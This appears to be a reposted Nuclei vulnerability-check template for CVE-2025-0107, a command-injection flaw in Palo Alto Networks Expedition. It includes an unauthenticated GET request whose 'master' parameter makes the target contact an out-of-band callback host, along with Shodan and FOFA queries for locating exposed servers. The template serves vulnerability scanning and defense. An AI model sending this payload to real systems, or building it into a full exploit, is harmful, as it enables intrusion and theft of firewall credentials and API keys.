An OS command injection vulnerability in Palo Alto Networks Expedition enables an unauthenticated attacker to run arbitrary OS commands as the www-data user in Expedition, which results in the disclosure of usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software.
PoC代码[已公开]
id: CVE-2025-0107
info:
name: Palo Alto Networks Expedition - OS Command Injection
author: iamnoooob,pdresearch
severity: critical
description: |
An OS command injection vulnerability in Palo Alto Networks Expedition enables an unauthenticated attacker to run arbitrary OS commands as the www-data user in Expedition, which results in the disclosure of usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software.
reference:
- https://security.paloaltonetworks.com/PAN-SA-2025-0001
- https://ssd-disclosure.com/ssd-advisory-palo-alto-expedition-rce-regionsdiscovery/
- https://nvd.nist.gov/vuln/detail/CVE-2025-0107
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
epss-score: 0.23403
epss-percentile: 0.95765
metadata:
verified: true
max-request: 1
shodan-query: title:"Expedition"
fofa-query: title=="Expedition Project"
tags: cve,cve2025,rce,paloalto,expedition,vkev
http:
- raw:
- |
GET /API/regionsDiscovery.php?master=spark%3A%2F%2F{{interactsh-url}}:443&mask=26&project=your_project&devices=device1%2Cdevice2&mtserver=127.0.0.1%3A3306&mtuser=root&mtpassword=paloalto&task-id=1193&mode=pre-analysis®ions=&parquetPath=%2Ftmp&timezone=Europe%2FHelsinki&mlserver=127.0.0.1&debug=false&initDate=2023-01-01&endDate=2023-01-31 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'msg":"Started'
- '"success":true'
condition: and
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 490a0046304402203fd40326a1be2a8b123b839f2f58009017ddefb2c0006a99b3b4fe12d0a6167002204f1816b94617d88d594c867ca516596b774995748692d0370a093fb0ff7b4c04:922c64590222798bb761d5b6d8e72950